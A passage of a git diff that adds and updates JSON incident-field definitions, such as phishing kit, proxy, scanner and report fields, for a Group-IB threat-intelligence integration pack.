"unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json new file mode 100644 index 000000000000..1a69a13ba581 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "caseInsensitive": true, + "cliName": "gibphishingkitemail", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingkitemail", + "isReadOnly": false, + "locked": false, + "name": "GIB Phishing Kit Email", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json index 59844aacb1f2..cc9d69a0f90e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing Kit" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json index f5dc6b364323..abc724c41120 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing Kit" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json new file mode 100644 index 000000000000..4839a2f08405 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingkitpath", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingkitpath", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Kit Path", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json new file mode 100644 index 000000000000..7db1c19b8fa4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingkitsource", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingkitsource", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Kit Source", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json new file mode 100644 index 000000000000..62dfcf7963cc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json @@ -0,0 +1,70 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingkittable", + "closeForm": true, + "columns": [ + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 280 + }, + { + "displayName": "Email", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "email", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {}, + {}, + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingkittable", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Kit Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json new file mode 100644 index 000000000000..2313a2f95c4c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingobjectives", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingobjectives", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Objectives", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json new file mode 100644 index 000000000000..4cb24e1cb9f5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingregistrar", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingregistrar", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Registrar", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json new file mode 100644 index 000000000000..465b542b2409 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingsources", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingsources", + "isReadOnly": false, + "locked": false, + "name": "GIB Phishing Sources", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json index f9f378d49957..9f68e6621e9b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json index 6ce42f301424..6ddc7011f324 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json new file mode 100644 index 000000000000..a7819376b33e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingurls", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingurls", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing URLs", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json index 1e9661cd59c9..81197ebb9757 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json @@ -7,7 +7,26 @@ "GIB Compromised Card", "GIB OSI Git Leak", "GIB Targeted Malware", - "GIB OSI Public Leak" + "GIB OSI Public Leak", + "GIB Attacks Deface", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Suspicious IP Socks Proxy", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB Data Breach", + "GIB Attacks DDOS", + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB OSI Vulnerability" ], "caseInsensitive": true, "cliName": "gibportallink", @@ -31,5 +50,35 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB OSI Git Leak", + "GIB Targeted Malware", + "GIB OSI Public Leak", + "GIB Attacks Deface", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Suspicious IP Socks Proxy", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB Data Breach", + "GIB Attacks DDOS", + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB OSI Vulnerability" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json new file mode 100644 index 000000000000..6e3dff7f6591 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibproviderdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibproviderdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Provider Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json new file mode 100644 index 000000000000..8dcd697c0787 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "caseInsensitive": true, + "cliName": "gibproxyport", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibproxyport", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Proxy Port", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json new file mode 100644 index 000000000000..20f1d669a04a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "caseInsensitive": true, + "cliName": "gibproxysource", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibproxysource", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Proxy Source", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json new file mode 100644 index 000000000000..b5b3000e0ccb --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "caseInsensitive": true, + "cliName": "gibproxysources", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibproxysources", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Proxy Sources", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json new file mode 100644 index 000000000000..f6132ee72458 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "caseInsensitive": true, + "cliName": "gibproxytype", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibproxytype", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Proxy Type", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Open Proxy" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json index 1d7cc044aff4..53a66e66c30f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json @@ -6,7 +6,31 @@ "GIB Compromised Account", "GIB Compromised Card", "GIB Targeted Malware", - "GIB Brand Protection Domain" + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat", + "GIB Cybercriminal Threat Actor", + "GIB Malware CNC copy", + "GIB APT Threat", + "GIB Data Breach", + "GIB Malware", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB OSI Git Leak", + "GIB OSI Public Leak" ], "caseInsensitive": true, "cliName": "gibrelatedindicatorsdata", @@ -30,5 +54,39 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat", + "GIB Cybercriminal Threat Actor", + "GIB Malware CNC copy", + "GIB APT Threat", + "GIB Data Breach", + "GIB Malware", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB OSI Git Leak", + "GIB OSI Public Leak" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json index 9af8866046ec..4b502181bce1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json @@ -8,7 +8,22 @@ "GIB Data Breach", "GIB OSI Git Leak", "GIB OSI Public Leak", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibreliability", @@ -33,5 +48,32 @@ "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" -} + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Data Breach", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" + ] +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json new file mode 100644 index 000000000000..8788bf171d6f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat" + ], + "caseInsensitive": true, + "cliName": "gibreportnumber", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibreportnumber", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Report Number", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json new file mode 100644 index 000000000000..2a307ccd4a7b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibreporter", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibreporter", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Reporter", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json index bed12b85bb76..56256da2984b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json new file mode 100644 index 000000000000..cfab294d0ea6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "caseInsensitive": true, + "cliName": "gibscannercategories", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibscannercategories", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Scanner Categories", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json new file mode 